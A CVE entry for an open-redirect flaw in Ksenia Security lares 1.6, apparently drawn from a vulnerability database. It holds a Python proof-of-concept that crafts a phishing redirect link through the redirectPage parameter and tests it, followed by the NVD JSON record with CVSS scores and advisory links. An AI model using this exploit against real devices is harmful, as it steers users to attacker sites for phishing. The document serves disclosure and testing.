CVE-2025-15112

import requests # CVE-2025-15112 PoC - URL Redirection in Ksenia Security lares # Target: Ksenia Security lares (legacy model) version 1.6 # Vulnerability: Open redirect via redirectPage parameter in cmdOk.xml target_url = "http://target-ksenia-device/cmdOk.xml" malicious_url = "http://attacker-controlled-site.com/phishing" # Construct malicious redirect URL params = { "redirectPage": malicious_url } # Generate the malicious link that can be sent to authenticated users malicious_link = f"{target_url}?redirectPage={malicious_url}" print(f"Malicious redirect link: {malicious_link}") # Verify the redirect behavior (for authorized testing only) response = requests.get(target_url, params=params, allow_redirects=False) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location') print(f"Redirect detected to: {location}") if malicious_url in location: print("[+] Vulnerability confirmed: Open redirect works") else: print("[-] Redirect target differs from expected") else: print(f"[-] No redirect response (status: {response.status_code})")

{"cve": {"id": "CVE-2025-15112", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.733", "lastModified": "2026-03-11T20:16:13.177", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) version 1.6 contains a URL redirection vulnerability in the 'cmdOk.xml' script that allows attackers to manipulate the 'redirectPage' GET parameter. Attackers can craft malicious links that redirect authenticated users to arbitrary websites when clicking on a specially constructed link hosted on a trusted domain."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 versión 1.6 contiene una vulnerabilidad de redirección de URL en el script 'cmdOk.xml' que permite a los atacantes manipular el parámetro GET 'redirectPage'. Los atacantes pueden crear enlaces maliciosos que redirigen a usuarios autenticados a sitios web arbitrarios al hacer clic en un enlace especialmente construido alojado en un dominio de confianza."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/190179/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kseniasecurity.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-url-redirection-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5928.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5928.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}